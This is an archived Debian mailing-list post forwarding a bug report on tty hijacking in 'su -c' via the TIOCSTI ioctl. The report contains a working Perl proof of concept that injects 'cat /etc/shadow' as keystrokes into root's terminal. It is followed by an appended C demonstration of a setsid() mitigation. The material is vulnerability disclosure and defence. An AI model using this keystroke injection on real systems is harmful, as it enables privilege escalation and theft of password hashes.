[Pkg-shadow-devel] Bug#628843: (forw) Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl
Christian PERRIER
bubulle at debian.org
Thu Jun 2 05:34:59 UTC 2011
tags 628843 help security
thanks
Security team, I need advice and help here. My co-maintainer for
shadow, Nicolas, is more or less MIA, so I'm left nearly alone to
maintain shadow. As Nicolas was also upstream, you understand how
desperate my situation is..:-)
(maybe this bug will ring a bell for Nicolas, still)
My expertise is, as you may expect, way outreached. So, in short, what
I need is someone with enough expertise to look at this bug report and
help decide whether adopting Redhat's patch is correct (assuming it
applies: I'm not sure that RH is using the same "su" as we do).
Mail CC'ed to submitter, too, so that Daniel also knows that the only
person who answers....needs help..:-)
----- Forwarded message from Daniel Ruoso <daniel at ruoso.com> -----
Date: Wed, 1 Jun 2011 15:24:47 -0400
From: Daniel Ruoso <daniel at ruoso.com>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: [Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl
Reply-To: Daniel Ruoso <daniel at ruoso.com>, 628843 at bugs.debian.org
Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical
After investigating why RedHat has a different behavior regarding "su -c", I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".
What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.
The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008
A very simple exploit follows (Perl code)
#!/usr/bin/perl
# TIOCSTI constant comes from the system ioctl header (h2ph-generated).
require "sys/ioctl.ph";
# /dev/tty is the controlling terminal the "su -c" child still has.
open my $tty_fh, '<', '/dev/tty' or die $!;
# Push the command, one byte at a time, into the terminal's input
# buffer; it is read by whoever reads the tty next, i.e. after su exits.
foreach my $c (split //, 'cat /etc/shadow' . $/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}
The scenario is:
Root runs a command as a less privileged user with "su -c"; if the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.
-- System Information:
Debian Release: 6.0.1
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages login depends on:
ii libc6 2.11.2-10 Embedded GNU C Library: Shared lib
ii libpam-modules 1.1.1-6.1 Pluggable Authentication Modules f
ii libpam-runtime 1.1.1-6.1 Runtime support for the PAM librar
ii libpam0g 1.1.1-6.1 Pluggable Authentication Modules l
login recommends no packages.
login suggests no packages.
-- no debconf information
_______________________________________________
Pkg-shadow-devel mailing list
Pkg-shadow-devel at lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-shadow-devel
----- End forwarded message -----
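As an added example (written here, not code from the bug report, from shadow's su or from Red Hat's patch), the C program below shows the effect of the mitigation the report points at: if the child command is started in a new session with setsid(), it has no controlling terminal, so open("/dev/tty") fails with ENXIO and there is nothing for TIOCSTI to target. Whether Red Hat's patch does exactly this is an assumption; the function names probe_controlling_tty and run_without_ctty are mine.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Fork a child and check whether it can reach /dev/tty.
 * If detach is nonzero the child first calls setsid(), which puts it in a
 * new session without a controlling terminal (assumed here to mirror what a
 * hardened "su -c" does before running the command).
 *
 * Returns the child's verdict:
 *   0  /dev/tty opened, so the command could use TIOCSTI on it
 *   1  open failed with ENXIO: no controlling terminal
 *   2  some other failure (setsid or open failed for another reason)
 *  -1  fork/wait failure in the parent
 */
int probe_controlling_tty(int detach)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach && setsid() < 0)
            _exit(2);
        /* O_NOCTTY: never acquire a terminal as a side effect of the probe */
        int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
        if (fd >= 0) {
            close(fd);
            _exit(0);
        }
        _exit(errno == ENXIO ? 1 : 2);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/*
 * Run argv in a child that has been detached from the caller's terminal
 * session. Returns the command's exit status, or -1 on failure.
 * Stdin/stdout/stderr are still inherited; only the controlling tty is gone,
 * which is the property the hijack needs.
 */
int run_without_ctty(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setsid() < 0)
            _exit(127);
        execvp(argv[0], argv);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    printf("child keeps session:  verdict %d\n", probe_controlling_tty(0));
    printf("child after setsid(): verdict %d\n", probe_controlling_tty(1));
    char *const cmd[] = {"sh", "-c", "ls -l /dev/tty 2>&1; exit 0", NULL};
    return run_without_ctty(cmd) == 0 ? 0 : 1;
}
```

Run from an interactive terminal, the first probe reports 0 and the second 1; the detached probe reports 1 whether or not the parent had a terminal. The trade-off is that a command which genuinely needs a terminal no longer has one, which is why later su implementations (for example util-linux su's --pty option) give the command a fresh pseudo-terminal of its own instead of just dropping the controlling tty.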